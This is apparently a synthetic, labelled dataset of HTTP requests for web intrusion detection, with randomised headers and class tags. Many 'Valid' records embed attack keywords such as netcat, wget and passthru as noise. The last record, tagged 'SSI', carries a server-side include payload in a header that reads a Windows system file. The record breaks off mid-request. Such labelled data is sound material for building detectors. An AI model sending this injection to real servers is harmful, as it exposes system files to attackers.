Referer: /liers/csmi8/su7i3a/aIiL4dd/octoppa.swf
TE: chunked;q=0.9,trailers
Trailer: If-Unmodified-Since
User-Agent: hlv4tis (i@SUJrT0)
UA-CPU: MIPS
UA-Disp: 1956,0325,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 116x3717
Via: 5.7 157.84.149.138
Transfer-Encoding: compress
Upgrade: ternt/2.2, gvhrO/1.0, 2n4E3h/6.6, 5tnucz/1.4, tsojiD/3.4
Warning: 045 www.jVoAw.htm:318 "Wteirsteatrhje7brwtl" "Thu, 17 Sep 09 15:24:18 UTC"
X-Forwarded-For: 171.216.17.6
X-Serial-Number: 31593732
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32472
Start - Id: 15361
class: Valid
GET /n0mEoiFta/g@4ivoyKxp_Ao/oS2v8@.Q9/5kperlT7VAR.php3? HTTP/1.0
Host: 152.110.75.106
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: saopon7-ts;q=0.8
Cache-Control: Eott='nt'
Client-ip: 1.126.250.57
Cookie: Ethd=w3brcie3
Cookie2: $Version="740"
Date: Sat, 20 Mar 04 23:36:35 CET
ETag: W/"rpsSZWkJNUkV0RD9"
Expect: 100-continue
From: hemanaoa@nrqynnnt.uk
If-Modified-Since: Mon, 29 Oct 07 14:26:09 GMT
If-Unmodified-Since: Sun, 23 Dec 07 07:35:29 CET
If-Match: *
If-None-Match: ".8OJTPD4dZU5BUYUcln"
If-Range: Mon, 12 Oct 09 02:53:55 UTC
Max-Forwards: 490
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM OGlndWVmdW5aZGZpbzRnZG5wbGlxYnJjYW5hbGFlc25pNXRy
Authorization: Basic YXJhZDpvZm5laGg3YQ==
Range: 75-,670-452322
Referer: http://sytw.uk/htygu9di/netwem.avi
TE: trailers
Trailer: TE
User-Agent: t0wehRysjbe2qhos6
UA-CPU: StrongARM
UA-Disp: 4712,7583,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 065x683
Via: 8.1 165.193.248.83, 9.6 176.168.39.193:60758, 0.4 112.61.19.189
Transfer-Encoding: gzip
Upgrade: taal/5.1, qooc/0.7
Warning: 463 38.25.235.94 "nanvauebu" 
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 7835814731
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 15361
Start - Id: 25144
class: Valid
GET /axIy/odtA8oriiw7grulngv8/owKcor623LizJOSRVi/rluytyl/f4Aauo.htm?erutST=qdvnhrtoesotcrlr&elainmdeetUiEr=lFmWVDBpNw&aNe=%3Dv HTTP/1.1
Host: 11.137.228.188
Connection: keep-alive
Accept: application/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: e-rt;q=0.7, d-ew;q=0.8
Cache-Control: only-if-cached
Client-ip: 32.228.225.57
Cookie: aTbnph7pXes=1915;kdiaLart=39710;varBevalW385=uoie;BqZSi=3
Cookie2: $Version="537"
Date: Sat, 10 Mar 07 09:55:56 UTC
ETag: W/"Ve.@D6zZ4Y6MV36UG"
Expect: peup
From: eMfiaeeO@ftisitrql.fr
If-Modified-Since: Fri, 06 Aug 04 10:58:31 CET
If-Unmodified-Since: Thu, 28 Apr 05 02:37:56 GMT
If-Match: "jFtle6ug98cD1VEuK_r"
If-None-Match: *
If-Range: "dR88Evj1OhKrV-m"
Max-Forwards: 2176
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: NTLM b3JkdHBhMWFvaGVsYXRFZWUzMG9pajlpc25vaTl0YW5udW4=
Authorization: Digest realm
Range: -7771,422958-
Referer: /dzNm2/msco/ietNii/tukag.asmx
TE: deflate;q=0.6,gzip;q=0.6,trailers
Trailer: If-None-Match
User-Agent: Teothnnp (mTUd@N; nKH_dA; bAAr2A; tuk9_gqD)
UA-CPU: Sparc
UA-Disp: 037,012,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5457x802
Via: 2.3 www.s6iltniy.png, HTTP/3.7 www.nhcVariO.jpeg
Transfer-Encoding: deflate
Upgrade: oulp3p/8.2
Warning: 667 www.ecitwrb.jpg "hagkslkdeoiEwoaeL" "Sun, 08 Aug 04 11:38:20 GMT"
X-Forwarded-For: 31.113.199.2
X-Serial-Number: 3897200999
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 25144
Start - Id: 222
class: Valid
GET /driIneaho94reied/to-AWoIOo@9/gE9r-OhQRWNJ69.NocR/ctOhl@TT_S.WRX.gif?abjely=1379 HTTP/1.1
Host: 250.83.128.153
Connection: gthbaoe
Accept: audio/*, video/mpeg
Accept-Charset: *;q=0.9
Accept-Encoding: identity, deflate;q=0.8
Accept-Language: tk-7pfyc;q=0.7, tocRte-pueostE;q=0.3, a9tuaa0r-Rm8;q=0.8
Cache-Control: min-fresh=759
Client-ip: 99.49.237.73
Cookie: oiie=0;8Gt-2-BPbc=2096139360;n0fej0axalSuai=84629;hbtnsntr6d6H6S1=7resol)forme
Cookie2: $Version="1"
Date: Fri, 23 Apr 04 01:49:49 CET
ETag: "3bWlFV3YHe@Xuz5Yh"
Expect: 100-continue
From: 0doILoeo@uhagi7pind.be
If-Modified-Since: Fri, 30 Sep 05 22:14:00 CET
If-Unmodified-Since: Sun, 29 Feb 04 24:33:06 UTC
If-Match: *
If-None-Match: "865hT2jUjD@nE09"
If-Range: *
Max-Forwards: 5829
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic ZXRlc2c0OmFwaWNn
Authorization: Basic VWNlZmVtZHA6aWVocw==
Range: -6,7844-
Referer: http://www.sseopi.cz/phe9S/e0rdg6o9/ttot/LpVtg.htm
TE: gzip
Trailer: From
User-Agent: Mozilla/7.3 (compatible; sdtd; Solaris; nlhGs)
UA-CPU: StrongARM
UA-Disp: 0159,402,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4314x599
Via: 3.5 www.NNar.htm
Transfer-Encoding: identity
Upgrade: tden/0.3, ytuoof/6.0, Hl57r/7.7
Warning: 582 65.217.95.237 "athescdhZEt" "Fri, 04 Nov 05 16:53:44 UTC"
X-Forwarded-For: 73.229.35.89
X-Serial-Number: 6490655826288634174
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 222
Start - Id: 7412
class: Valid
POST /0oi52daye/c9EpVtP8adnchrS/aS@azgxdtme9N/eOilnhVpoQQa.E/eCq/xxBR9/ultmart9lealR/neybolnrdla/d2nVdKSbyW/xgU/LJg1IjcTdDgb@Qr.tiff? HTTP/1.0
Content-Length: 132
Content-Language: 2anonO
Content-Encoding: gzip
Content-Location: /irrpu/mbBolm/sbsAzer/Teoekhw/niArioe.msf
Content-MD5: cjBvaFN3cnJPZWhobkF0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 16 Jun 08 12:12:45 GMT
Last-Modified: Mon, 10 Aug 09 09:36:50 GMT
Host: www.cganWa4t.ch:80
Connection: g5ry
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: G2saOdi-htynnem, n-efmyng;q=0.3, binanir-it7v6m;q=0.8, 5ms-eodidmaS;q=0.0
Cache-Control: max-stale=83
Client-ip: 7.158.25.22
Cookie: wnw=57021;8Imetlla=$;f0nUeaHjp6sct= ;NiD5xordceb0col=urK hrw \;ZFiframeWasl5=woxRwadtltuta;nia8=0eer8
Cookie2: $Version="688"
Date: Sun, 18 Jan 04 19:44:44 GMT
ETag: "WDPQo2By79dImmZtfm_"
Expect: 100-continue
From: lKiext@4bU5bHmi.st
If-Modified-Since: Tue, 29 Dec 09 12:24:46 UTC
If-Unmodified-Since: Sat, 08 Sep 07 22:06:06 CET
If-Match: *
If-None-Match: "J0Kc6.d-D19ne2e6w"
If-Range: *
Max-Forwards: 2
MIME-Version: 3.8
Pragma: ogr='te'
Proxy-Authorization: asue bpcdhTC=a83idrez
Authorization: Basic dWFpOWFkNTpuc2F0aEU=
Range: 93946-846,3-1
Referer: http://www.iinofwie.it/ti8s5eB.dll
TE: deflate
Trailer: If-Range
User-Agent: Mozilla/2.5 (compatible; dTUcNzial; Solaris; gcirRasfyo)
UA-CPU: StrongARM
UA-Disp: 3035,3287,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9649x7067
Via: HTTP/3.8 www.9necd.html
Transfer-Encoding: gzip
Upgrade: arsv/7.3, gzM/6.6, neme/1.8, raLOwa/5.7
Warning: 551 www.9re4it.js "elep4oejil3EeHoa" 
X-Forwarded-For: 248.139.237.35
X-Serial-Number: 896535
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nifwibce=hw&9W9rk@yY4=aa&pd&oactmptcszmyesg=xiowBhlbrcmaEmobel&-n-3_OpassthruDa=n5a3&ynbh2im=c imgsij&8e=14055323&Ham=eetAd?arsx

End - Id: 7412
Start - Id: 7261
class: Valid
PUT /aSGm@8DhHimg./td8o7olNr8rm5dhz8/TdsEndLeeovfke/ihVjbTO4xFPB0Cm5/vaccc/Vc0UAz_LM/oxp_.js? HTTP/1.1
Content-Length: 172
Content-Language: a0eebIgs,ebtio
Content-Encoding: compress
Content-Location: /c9lO8g/ngplyts/riaytuf.php
Content-MD5: bzNUZUNuZnIxU3NlcXhhMA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 08 Apr 10 14:51:31 CET
Last-Modified: Fri, 21 Jul 06 14:48:56 CET
Host: www.otyE68zt.de
Connection: mnaa
Accept: */*;q=0.7
Accept-Charset: x-mac-japanese, utf-8, windows-874
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 196.211.62.246
Cookie: tt5lrece=nmI're  am EtFdog;8st=whwnprdd;dtMrqnwitwte6bp=554;ntierdhoar=RtIades;jpositionKj0GNfZK=5200;9ilifmtd=$i  
Cookie2: $Version="79"
Date: Sat, 02 Oct 04 18:27:31 CET
ETag: "ZhawkyVNT2q.LOx"
Expect: 100-continue
From: tsrazhte@n9aeeuk.be
If-Modified-Since: Mon, 15 Jun 09 07:25:51 GMT
If-Unmodified-Since: Wed, 29 Jun 05 09:42:56 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 06 May 09 11:00:44 CET
Max-Forwards: 2
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: ntsAjG eRoonit=huowas9
Authorization: Basic aTJBYWVmbDpuN2tz
Range: -805
Referer: http://lqeevi6o.uk/hstosief/irdPo.ace
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.5 (X11; U; Open BSD i586 1.9; ie-7m; rv:7.2.5) Gecko/34948811
UA-CPU: StrongARM
UA-Disp: 6402,121,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 629x010
Via: 9.5 139.26.160.177:6
Transfer-Encoding: gzip
Upgrade: 1tvot/8.2, om0aAe/7.9
Warning: 038 www.lr6tO.html "rmcnauss8" 
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ne2m5stA=netcat6iarnaf ihw&ytirpuHtonBcitu=nij@rRet8enasfi&mx8m=vnT3Jnd;ay&aoegwedi9aEa=ur>etege'16sprocessing-instruction\&nTtgnj=rhitqzmlcoct&hfrntrAeninliiG=be

End - Id: 7261
Start - Id: 8193
class: Valid
GET /iGHJAKSNX/rOniolcwt.gif?eer=rmVX3mtl74&eentitat3eZs7ee=h&tgiebLseroio=baOan7sd&giSosretafu=z9h%40ptm&Roueaneerrtbc=8456&Abj-home=egc6ec8dowc HTTP/1.1
Host: www.l6IlEes6t.fr
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 87.9.157.161
Cookie: 5i=hj0gRX91k;7oce0oaiaA=bdox;xRm=cef|d;teem=rPS48Isgi;941.-vbodyXC=7;woShonuigpq2=ag5x
Cookie2: $Version="2"
Date: Tue, 25 Sep 07 06:51:24 UTC
ETag: W/"EOXO9OYaUDsivz7"
Expect: 100-continue
From: iyfdu@nabsveeOr.de
If-Modified-Since: Wed, 25 Jul 07 16:34:11 CET
If-Unmodified-Since: Sat, 19 Apr 08 10:23:33 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Jun 05 18:24:08 GMT
Max-Forwards: 3660
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic cW5kcm5pOmdzaWFn
Authorization: yocad oRIvaheh=ponr
Range: -155,-198
Referer: /n8emri/ymlSih/tthborLs/nyrDde.js
TE: gzip,gzip;q=0.9,chunked;q=0.2
Trailer: Accept-Charset
User-Agent: Mozilla/7.3 (X11; U; Open BSD i386 9.2; ar-eh; rv:9.2.7) Gecko/09964903
UA-CPU: x86
UA-Disp: 260,910,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1852x378
Via: 8.1 www.le7iyte.png, HTTP/1.6 243.131.91.241
Transfer-Encoding: compress
Upgrade: 9o6e/7.7, eaTRi/7.4, yaoEli/5.7, rnj/7.6, pad/2.0
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 93.63.20.222
X-Serial-Number: 81045574594520616
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8193
Start - Id: 24509
class: Valid
GET /vn_J-p0MbkFilnBMuM1_/eoohDR5erbee/gtirt7no.php4?gdfkESpIsrnce=iss+so%3Dise8iBh%252s%5B%25 HTTP/1.0
Host: 12.117.110.204
Connection: close
Accept: application/*;q=0.1, text/plain
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: cik7so-asdor, g-eWdaag;q=0.8, n-a, mate-y;q=0.4, gnuratmn-Sae3;q=0.5
Cache-Control: v1='hsrcnm5m'
Client-ip: 213.202.71.157
Cookie: NWXM=eXs7hQ;5rrcnrcOsroDmt=gQI;lbm9=45;acceptuvP3il=465cpps;whereuvSB=3
Cookie2: $Version="305"
Date: Fri, 05 Mar 04 17:19:52 UTC
ETag: "S4zTUrwjKvccHcU7"
Expect: 100-continue
From: pzwu7iEa@yhivtK.st
If-Modified-Since: Fri, 07 Jan 05 04:00:30 UTC
If-Unmodified-Since: Sat, 22 May 04 22:49:55 UTC
If-Match: "t43dBvnv17ly7kDyx"
If-None-Match: "dyMPaz_Dugh39UUup"
If-Range: Fri, 17 Sep 04 15:58:21 UTC
Max-Forwards: 3740
MIME-Version: 6.1
Pragma: EdqOt=iuMen
Proxy-Authorization: Basic ZXNTZmFhOmVvaWZkb3M=
Authorization: NTLM a2l0VThuMWtlUmVhb3NsdGFubzJvYzd1ZElJZWhNYkpkaWlwdGc=
Range: -21432,-0306,46912-
Referer: /7eu5e/E3xa/bYmo/oe9o0a.bin
TE: trailers,deflate,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/7.4 (Windows; U; WinNT 9.1; 0s-gE; rv:1.1.3) Gecko/24784452
UA-CPU: PowerPC
UA-Disp: 9148,760,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0451x999
Via: FTP/2.8 205.76.50.182:03078, 5.9 194.33.12.22, 8.8 www.I7tEhomn.gif
Transfer-Encoding: compress
Upgrade: sem/4.3, wo5ey/5.5, nzioc/1.6
Warning: 034 www.Spei.html "fet3seino8hio" 
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 185732331097779
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 24509
Start - Id: 2713
class: Valid
GET /uetrdaosuiet1to/akl7uWGVuMlpdt5hn/iCoVe7GG@v.tiff?8v1n8ecezyat=a%3Fc%5Cm&jae0nPdss=iCcc.OYIkB&o43emoh7IeNuoh=5955133&aT1yZ=n6dnt&nMOu1ZoX=70886&sOeh=5-aqUCU&eahtc4shmi1h=271 HTTP/1.1
Host: 147.81.206.215:80
Connection: keep-alive
Accept: image/gif, video/mpeg
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: r4eq-v3;q=0.5, 3nhr6-a, 3bih-ekebsjs;q=0.1
Cache-Control: max-stale
Client-ip: 118.196.176.82
Cookie: VkM%uL=I4like7;svKvo=377670914
Cookie2: $Version="39"
Date: Wed, 05 Mar 08 17:04:49 GMT
ETag: "RKKL@1pDaFebBqB"
Expect: 100-continue
From: c2ii@ovl17.gov
If-Modified-Since: Fri, 14 Nov 08 06:11:00 CET
If-Unmodified-Since: Tue, 12 Aug 08 03:33:59 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Mar 10 14:19:40 GMT
Max-Forwards: 15
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: hnknte 6dhe=ailltedl
Authorization: Digest opaque="heyaRile"
Range: 800-526712,0803-
Referer: /egmh0doc/4xwyE3.exe
TE: gzip;q=0.8,trailers,deflate;q=0.2
Trailer: Warning
User-Agent: mDSgiwG http://www.iHcrlt.org
UA-CPU: 68000
UA-Disp: 153,380,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 486x934
Via: 4.1 23.96.236.139
Transfer-Encoding: tnEesn; ixCRccn=ndioql
Upgrade: foys/2.8, sSboa/7.3, alt/9.7, arhxe/9.3, g5ee4a/9.9
Warning: 722 219.161.37.147 "eueen5o9vYS" "Tue, 30 Aug 05 03:30:07 CET"
X-Forwarded-For: 185.239.118.59
X-Serial-Number: 053261538285243
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2713
Start - Id: 28310
class: Valid
GET /etbjxe1c/thNp/apIRCxksaVuxobPjPbd/lhi1ucf7nodr/deBFIETxmOc_wYitc.php?VydropFt7HALMy=lMxmTk&9pPnKtelnetoptF=ewdfLminhglrotm&sKoCemnpi=8t%5C&qp1mocha.LHtn=1r%408ele42gwbia%5Dr&sSsHZHbCz=7&Xdocument9B3Lj3A=okqan&WSWKZz0XgN=vo&h-qxtermCFviR2z=7215772&S6otblvset=erH+wget&logspsdgc0G-=%3Ft1oU8h+Y4cAtr%5DdT6a&bb=0&gBifysf4un2=epqYp&binclude40dnetcatoZ5system=1&aha2tRltehfs=43&ceyaeh=SaiAamdfu HTTP/1.0
Host: 239.218.52.226
Connection: keep-alive
Accept: image/*;q=0.8, application/*;q=0.4, audio/x-wav
Accept-Charset: koi8;q=0.3, iso-10646-ucs-2;q=0.0, iso-8859-4;q=0.6, windows-1258, iso-8859-1;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 78.250.236.75
Cookie: cvTdrrtl6eAEapi=vh47i;oaaeipctonh=o6cduo;f9B@Fmw8=ono1c-n oitIo;css=qat;wu3=79866697
Cookie2: $Version="415"
Date: Sat, 19 Aug 06 07:54:22 GMT
ETag: W/"H3GHZS5jvgfMOhF0s4"
Expect: 100-continue
From: trodmys@wuil.gov
If-Modified-Since: Tue, 27 Dec 05 10:50:36 UTC
If-Unmodified-Since: Sat, 31 May 08 14:51:41 GMT
If-Match: "Yq8kKN.oP@PE4vGWLa"
If-None-Match: "ZcNkib8HyclwqbvJ"
If-Range: *
Max-Forwards: 3
MIME-Version: 7.4
Pragma: cceeejem='iln9'
Proxy-Authorization: fiOa firpim=eteposo
Authorization: NTLM ZHJpZGJqNWdod2U0YmljMW11c2luem50eWFpZzVFdWU=
Range: -626781
Referer: /iecnee/merEtsw/ul5ia.nsf
TE: trailers,trailers,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.3 (Windows; U; Windows NT 6.0; ot-un; rv:1.5.0) Gecko/30576287
UA-CPU: x86
UA-Disp: 5474,653,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 680x9650
Via: dtGt/6.0 215.68.96.86
Transfer-Encoding: gzip
Upgrade: amcAh/7.2, emad3/8.4, oatab/2.4
Warning: 426 www.nrw0ic.jpeg:9 "n4mgt15rinhub" "Tue, 29 Jul 08 12:09:46 CET"
X-Forwarded-For: 198.61.218.144
X-Serial-Number: 353988782
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28310
Start - Id: 13155
class: Valid
GET /mcrctkC5eiEal/mHd3ABNgXEhj8A1r/ethof1vdoddeitelosw/avgs5chTIhltIybadtic/es7Km2.fkzGiG0YGmzq.htm?abYl=nI4Ndd2pzaae6soarn&jstetea=cbece&aoehemdb=escnslshttps%27ean2nx&Ytdretaingsea33=0&hm=%7ClH&SyB3tIPc=3++d&nntsiahtg=0hczuA&vva5ep6ycseTeaA=rHa&xmAcptoyeHacBtd=m&p82eEeivcnhude=49173167&4snlh=e&netcat1_KRJbPLqQ=6&hi3otdlmetsesn=d%40t HTTP/1.1
Host: www.t5ohseb.de
Connection: close
Accept: video/mpeg;q=0.2, video/*, video/quicktime
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: pDaIe-ez3lNh0d;q=0.9, dE-d5dAkf9, M-z
Cache-Control: min-fresh=91
Client-ip: 240.231.186.98
Cookie: f0eosBed7= g
Cookie2: $Version="08"
Date: Thu, 07 Jun 07 11:52:39 CET
ETag: W/"P8rNSL5HVu3tWde"
Expect: wEt2mh3
From: ibuest@tharmq.fr
If-Modified-Since: Mon, 01 Sep 08 10:05:53 CET
If-Unmodified-Since: Thu, 08 Feb 07 06:20:35 GMT
If-Match: "66nIiUidlRLxcTjK_M7"
If-None-Match: "UciD0zCslT4vWbW3-"
If-Range: *
Max-Forwards: 0818
MIME-Version: 8.5
Pragma: tdautse0='zimdE6Is'
Proxy-Authorization: Digest realm
Authorization: Digest qop=indiwsn
Range: -22,686-,439169-
Referer: /aTt2nsm/1resNett.js
TE: deflate;q=0.8,trailers
Trailer: Max-Forwards
User-Agent: aresceh0et/4.2.0.3.6
UA-CPU: Sparc
UA-Disp: 806,0738,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6456x555
Via: 5.5 182.21.250.254
Transfer-Encoding: hape; 7sTapit=ojHast
Upgrade: r7hret/3.9, mve/5.9, oiIbha/2.2, anpn/6.2, voe9h/2.5
Warning: 192 204.117.243.8 "rjhts" 
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 74489
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13155
Start - Id: 22381
class: Valid
GET /tr4mksk1lEJl8HEEJs6W/1utaet1gaeeyOu/XAHjlp/nithr6ireiHC6ytef/j05.rmF/eqCFhnpIFreClv/b8Eoiiyod5/fNnialhto4iitvaoea/Q3m0shutdown/dt_u/eu2.png?eo=m%407H&reoooershldo=mbzhc-B&kfr8wxterm=qdocrolt HTTP/1.0
Host: 209.230.24.121
Connection: oB2t0o
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 231.247.76.251
Cookie: TIoaFeBH@=1 mtn;1window.opendropcOinY5xterm=likeS shidHeAo ;2Rhknshavingv@=eU9JKuYj;ldocumentcBDK.OKUunion=passthruv|;eHa_PsNDh=442
Cookie2: $Version="6"
Date: Sun, 07 Jun 09 16:17:30 GMT
ETag: W/"rZV2_AcwMYX1wAjFkfQ-"
Expect: issz=aoSld;ueLbeine=nwnthh
From: Thg1b@weOoea0a.org
If-Modified-Since: Mon, 10 Nov 08 16:44:10 UTC
If-Unmodified-Since: Tue, 26 Jul 05 20:21:49 UTC
If-Match: "fkQ6SsTJCwaDDLF8"
If-None-Match: *
If-Range: *
Max-Forwards: 66
MIME-Version: 2.1
Pragma: 6ea='tye'
Proxy-Authorization: Digest uri=http://oaaa.com/neutur/gmqe/y1hen1/oiewude2/t2mmveSO.pdf
Authorization: Digest uri=http://www.cxgant9.it/7dctveTm/iesihisa/iqeeImi.ace
Range: -912509
Referer: http://www.dimo.fr/Acsinasi.rar
TE: trailers,gzip;q=0.1,trailers
Trailer: Date
User-Agent: s4r0ynde (st5VdbrnT; s4MUvl)
UA-CPU: StrongARM
UA-Disp: 1777,9655,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 112x1566
Via: 1.6 220.250.180.184
Transfer-Encoding: compress
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 201 200.172.85.148 "uwxb7lfeBdn3mteneoad" "Thu, 28 Sep 06 02:25:40 GMT"
X-Forwarded-For: 7.132.119.46
X-Serial-Number: 570685869927204
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22381
Start - Id: 10455
class: Valid
GET /tDnpOOI51IDc2/azCE.F.htm?njne=th HTTP/1.0
Host: 100.98.61.93
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.6, iso-2022-kr;q=0.3, x-mac-ce;q=0.1, x-mac-arabic;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 64.61.12.166
Cookie: esTafistIase=lWnhOWAvruSO;ym9cnfnq=e7/+ ;tnleo=3821;oo5=rDAJEzM
Cookie2: $Version="955"
Date: Fri, 16 Jun 06 14:58:02 GMT
ETag: W/"E7SJFnASO1TYXWbI"
Expect: 100-continue
From: adwhievh@07neTe5sO.uk
If-Modified-Since: Sun, 27 Nov 05 19:44:08 CET
If-Unmodified-Since: Fri, 26 May 06 08:02:09 GMT
If-Match: *
If-None-Match: "-50on89I6ho5nqCX.hST"
If-Range: Fri, 14 Aug 09 08:49:02 CET
Max-Forwards: 06
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic aXp1aUhzYWU6cXRpdHJublU=
Authorization: Basic ZHRybGdrdDpzb2dyRWhudA==
Range: 5-355295,61313-1,05930-37268
Referer: http://gsaon5a.uk/dcagl/aecrch/0sKs.cfm
TE: trailers
Trailer: Accept
User-Agent: Mozilla/8.6 (compatible; MSIE 8.4; Linux i386; grdemr)
UA-CPU: StrongARM
UA-Disp: 4910,021,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 166x378
Via: FTP/7.6 www.Rtre.gif, HTTP/7.6 247.238.200.57, retor/7.3 www.eqtqao.html
Transfer-Encoding: deflate
Upgrade: ctah/6.6, Rtzei/0.4, fl4/6.0, eofhle/5.9, 7euoNe/5.2
Warning: 079 207.58.135.243:6637 "lldeeiya7z2nb" "Sat, 20 Mar 04 17:46:02 CET"
X-Forwarded-For: 39.2.165.130
X-Serial-Number: 58382526590847
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10455
Start - Id: 26399
class: Valid
GET /01bON5yP0U1MuYIFNoJ/7eRiJPnjlZ2yIGi/R15nG.y/eQHnLPI-bV4jzt/wXX3EWc6mKfm4FciCR/rBett2aaulbOBmCv/kAhIG_BKhYw98WfZ3/jeLRBdropqxspvnU6/TuT39XkaGinjdhjw/Xt_fromStmpQ/mAdsy0uJsp3pXDK.cfm?ghduos5nteahrA1=ttdz&ShevalVA=13484531&mmxa=60250662&nsaeEbtlrm=3&SfJe_=9987&noh5ph=Crroe&88wssser2etag=nbib0nlmkN%3E5iqf&ea7e7rjneO=ta&set=eceeeira1&rIXameiei5i=os0wcopy HTTP/1.0
Host: www.hrnyso.uk:80
Connection: shescic
Accept: */*;q=0.5
Accept-Charset: cp-950, windows-1255;q=0.1, us-ascii, iso-2022-kr;q=0.7, x-mac-turkish;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=3
Client-ip: 54.74.39.82
Cookie: NAr=03;srneaifcohertv=no|;ncme=e;6nhe=4;XSVZaYRDb=inoEDaG
Cookie2: $Version="9"
Date: Tue, 27 Sep 05 07:05:05 GMT
ETag: "BtGmuiTJbq0QqP691s"
Expect: 100-continue
From: aR5eoW@aIpYiyate.org
If-Modified-Since: Mon, 02 Apr 07 17:36:35 GMT
If-Unmodified-Since: Sun, 29 Aug 04 15:58:23 UTC
If-Match: "@N3zn2RrfIt1ddL-E"
If-None-Match: "MA1P6jjk0H5RsePCFt3d"
If-Range: "9T9ULjvohvv.hIO"
Max-Forwards: 043
MIME-Version: 8.7
Pragma: sltgns=flIeaee
Proxy-Authorization: Digest nonce
Authorization: NTLM aWJlZ3R1b2Nlb3B0bnN5ZWhvZWFkNDk3aXNlZWx0cGtw
Range: -954249,93-21781,60217-
Referer: http://www.acefyoo.fr/Sld5a.jsp
TE: trailers,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: s7osiejT6iattn
UA-CPU: StrongARM
UA-Disp: 146,5965,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4505x535
Via: FTP/7.4 152.70.26.11, 7.1 www.htmrdodc.html
Transfer-Encoding: compress
Upgrade: erbyd/5.4
Warning: 349 149.251.216.132:04493 "cdpjadbDey" 
X-Forwarded-For: 219.37.112.200
X-Serial-Number: 7631325909856
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26399
Start - Id: 40369
class: SSI
GET /fSju9.1Z_1EYhFfsPWX/rEbv@RkrMI/562/n@S406AoE0.cfm?nsixrcreaefd=Snetcatlasanaa%40eerma&tdvs=esFE2Z&odlEno6lne=pn1elcecho%24aNze2 HTTP/1.0
Host: www.4href1fy3.de
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312;q=0.2
Accept-Encoding: *
Accept-Language: <!--   #include    virtual="c:\winnt\system.ini"-->
Cache-Control: no-transform
Client-ip: 205.71.235.181
Cookie2: $Version="95"
